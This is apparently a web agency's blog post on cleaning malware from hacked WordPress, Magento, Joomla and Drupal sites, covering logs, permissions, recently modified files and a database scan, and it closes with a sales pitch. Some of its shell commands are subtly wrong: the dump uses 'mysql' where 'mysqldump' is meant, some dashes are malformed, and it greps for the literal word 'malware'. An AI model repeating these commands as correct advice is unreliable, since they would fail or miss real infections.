What do I do ?
Usually, popular CMS (Content Management System) like WordPress, Magento, Joomla and Drupal are more prone to face malware issue than compared to custom developed web applications. This is mainly because many developers across the world know more about these popular CMS. The rich eco system of open source CMS allows developer’s to contribute features and functionalities in the form of modules, extensions and plugins. Some of these plugins may not have been adequately tested for security vulnerabilities.
How did you come to know your website is hacked or has malware?
– You noticed your website is disfigured or shows warning message browsers
– Your customers called you saying browser is displaying malware alert
– You received notification from your website hosting company
– You received notification from Google webmaster
If your WordPress, Joomla, Ddrupal or Magento website is hacked for the first time and Google is showing malware warning message. We recommend contacting your website developer immediately.
An experienced web developer could start investigation by performing the following steps:
– Analyse domain logs
Check your website’s access log, ftp logs and error logs. Access log will give an indication as to which pages were accessed, when and which was the IP address repeatedly making abnormal requests. Error logs will provide some information as to which IP address are making unusual request that is throwing errors. Sometime, there is a possibility of your ftp account being compromised and checking the ftp logs will tell which IP address was the last to login using your ftp credentials. If any of the investigation looks suspicious block the offending IP address or change your ftp login immediately.
– Check for file permission
Whether it is WordPress, Drupal, Magento or Joomla. All CMS have their own file structure and there are certain directories that require write permission for CMS to operate effectively. Web developers normally are familiar with CMS specific file structures and permissions. For eg. in Magento “var” directory needs to have read/write/execute directory permission. This directory is where Magento by default stores cache, session and Magento specific logs. Similarly in wordpress “wp-content/uploads” needs to have read/write/execute permission as this folder is where users normally upload’s media content. With Magento and WordPress besides these two directories other files and folder can be locked down with a higher security of directory and file permission.
– Check CMS login for unusual users, pages and content
CMS like WordPress, Magento, Joomla, Drupal provides administration login interface for managing content, plugins and pages. Check for any unusual pages created or unusual users. Remove any unwanted login username and pages associated with them.
– Check for latest uploaded or modified file.
If your hosting allows SSH (Secure Shell) access to the website then you can perform this tasks fairly easily using the shell command:
To list directory and file details and sort by date starting from the latest.
$ “ls -alt”
The command below finds files from the current directory that was edited or uploaded in the last 24 hours and creates a new file investigate.txt with links to investigate later.
$ “find . -mtime -1 – print > investigate.txt”
With FTP (File Transfer Protocol) login you can perform the above tasks. It takes a lot longer than using SSH access.
– Check for malware insertion on your scripts
The command below recursively checks for instances of malware insertion across all files.
$ “grep –R malware *”
By performing the above tasks should have shown positive results of malware being inserted on the scripts or new scripts uploaded.
If no results are found from the above commands then it is time to go to the next step and that is database. It is likely that the malware is most likely in the database and time to investigate your database.
– Investigate database
Start your database investigation first by creating a SQL dump and a backup of the database.
Create SQL dump of your database using the command below:
$ “mysql –uusername –ppassword database_name > mydatabase.sql”
Create a backup copy of your database:
$ cp mydatabase.sql mydatabase_backup.sql
Once you have taken a backup of database, we will need to scan database for any keyword and malware related terms.
To scan database using keyword terms
$ grep “malware” mydatabase.sql
If any malwares terms are found we can manually remove the malware insertion from database using search and replace features of your editor. Database these days have large file size and removing manually could be time consuming. We can perform this task using a single SSH command.
Open the mydatabase.sql using your favourite unix editor.
To open file using unix vim/vi editor:
$ vim mydatabase.sql
Remove or replace malware:
If you have followed the steps then by this stage you should have been able to identify the malware whether it is on the web directory, scripts or database. You should now be able to identify and clean the website.
Once you have removed the malware and cleaned the website. Advice your client to upgrade the CMS or extensions/plugins that has been used.
Perform the following action after cleaning the website:
– Upgrade CMS and any used plugins and extensions
– Set proper file and directory permission
– Remove unwanted CMS users or unwanted pages and posts
– Remove any unused plugins/extensions/modules
– Implement CMS specific WAF (web application firewall)
– Change default username and login URL to discourage brute force attack
Once you have tested and confirmed that the website is clean. Explain the tasks you took to clean the website and request a review using Google webmaster login. If you do not have webmaster login you can create a new webmaster login and then submit a review. Having webmaster login will also provide additional information about the website and is useful for the future. Alternatively, you can also ask review from StopBadware.org. Browser like Mozilla Firefox and Google chrome shares data with StopBadware.org
I cleaned my website but the Malware is back again after sometime. What do I do now ?
During your first malware attack you must have made contact with your web developer and your hosting agency. If you are paying the hosting cost to your web developer or web design company, it is time to ask your web developer the hard question? Ask them if your developer or web design company manage their servers. Most web design companies resell hosting services where server’s in reality are managed by other agencies.
Identifying the root cause of malware issue could take more time than usual, this is only because your web developer do not have root access to the server or information about server setup, firewall and softwares installed. Your hosting companies simply provides hosting platform and do not know about scripts running on individual domains.
This lack of communication and information exchange between your web developer and hosting company could be frustrating and a time consuming process.
At the end of the day, you and your business is suffering the most and it is time to act fast.
Businesses today make significant investments on their websites and depends on their website for new sales and leads generation. Repetition of malware attack will hurt your company’s reputation, damage search engine ranking and adversely affect online marketing initiatives.
The root cause of your website getting infected could be due to other reasons.
Some of the reasons could be:
– Other websites/scripts on the same server could be vulnerable and actually infecting your website
– Server could be infected and as a result attacking your website
– Server operating system and software are not patched and makes your script vulnerable
– Unused ports are open and software configuration is not properly set
If above is the case then it is time to contact a digital agency, who understand development of your CMS website and more importantly manages their own servers. Premium digital agencies are more likely to manage their client’s website development and additionally manages their own servers. Premium digital agencies have hands on understanding on their server infrastructure and have development team who have experience and knowledge on development aspects of your CMS platform. They will be able to keep your scripts on quarantine mode, configure and set database query log and have access to server logs and monitor your website specific activities. With these expertise and experience they will be able to identify the root cause of the issue and fix the issue on permanent mode. Most importantly resolve your issue fast.
Netable has a team of developers and system administrators. We manage our own servers and have helped businesses when their websites were hacked or showed malware warning.
Author: Suraj Rai
Suraj started as a web developer 15 years ago. He has over 10 years of experience as a unix system administrator and is AWS (Amazon Web Services) Certified Solutions Architect.
Please contact us on 03 9553 0449 or email@example.com if you are experiencing malware warning.